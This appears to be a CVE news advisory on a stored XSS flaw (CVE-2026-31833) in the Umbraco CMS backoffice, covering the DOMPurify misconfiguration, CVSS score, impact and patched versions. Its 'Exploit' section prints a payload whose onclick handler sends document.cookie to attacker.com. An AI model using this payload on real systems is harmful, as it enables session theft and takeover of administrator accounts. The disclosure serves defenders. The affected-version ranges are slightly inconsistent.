Umbraco, Stored XSS, CVE-2026-31833 (Medium)

Listen to this Post

The vulnerability, identified as CVE-2026-31833, is a stored cross-site scripting (XSS) issue found in Umbraco CMS versions 16.2.0 up to 16.5.1 and 17.0.0 up to 17.2.1 . It allows an authenticated backoffice user with access to Settings to inject malicious HTML into property type descriptions . The core of the problem lies in an overly permissive configuration of the DOMPurify HTML sanitizer used in the Umbraco Flavored Markdown (UFM) rendering pipeline . Specifically, the `attributeNameCheck` setting was configured with a regex value of /.+/, which matches any character one or more times . This permissive setting meant that dangerous event handler attributes like `onclick` or `onload` were not filtered out, as long as they were used within specific Umbraco web components such as umb-, uui-, or `ufm-` . When a property type description containing this malicious HTML is rendered in the backoffice, the injected JavaScript executes in the context of another backoffice user’s browser, leading to the stored XSS . The issue has been patched in versions 16.5.1 and 17.2.2 .

dailycve form:

Platform: Umbraco CMS
Version: 16.2.0-16.5.0,17.0.0-17.2.1
Vulnerability : Stored Cross-Site Scripting
Severity: Medium (CVSS:6.7)
date: March 10, 2026

Prediction: Patched versions available

What Undercode Say:

Analytics

The vulnerability was published to the NVD on March 10, 2026, and was reviewed and added to the GitHub Advisory Database by March 11, 2026 . It has a CVSS v3.1 score of 6.7, with a vector string of CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L, indicating a network attack vector with low complexity . While it requires high privileges (authenticated backoffice user), it impacts confidentiality and integrity highly with no user interaction required for the initial injection, though the malicious script would execute when another user views the description .

Exploit:

An attacker with Settings access could inject a malicious payload into a property type description field. The code would leverage the permissive DOMPurify filter to include an event handler within an allowed web component tag.

<ufm-component>

<div data-ufm="test" onclick="fetch('https://attacker.com/steal?cookie='+document.cookie)">
Click me if you dare!
</div>

</ufm-component>

When another backoffice user views this description and clicks the element, the JavaScript within the `onclick` handler would execute, potentially stealing session cookies or performing actions on their behalf.

Protection from this CVE

The primary and recommended protection is to upgrade to the patched versions: 16.5.1 or 17.2.2 . This update corrects the DOMPurify `attributeNameCheck` configuration to properly filter out dangerous attributes. Administrators should ensure their Umbraco CMS installation is updated immediately as there is no official workaround available .

Impact

Successful exploitation allows an authenticated attacker with Settings access to perform stored XSS attacks against other backoffice users . This could lead to the attacker performing unauthorized actions within the context of the victim’s session, such as modifying content, creating new administrator accounts, or exfiltrating sensitive data accessible in the backoffice . The vulnerability directly targets the administrative interface, posing a risk to the integrity and confidentiality of the CMS management environment.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top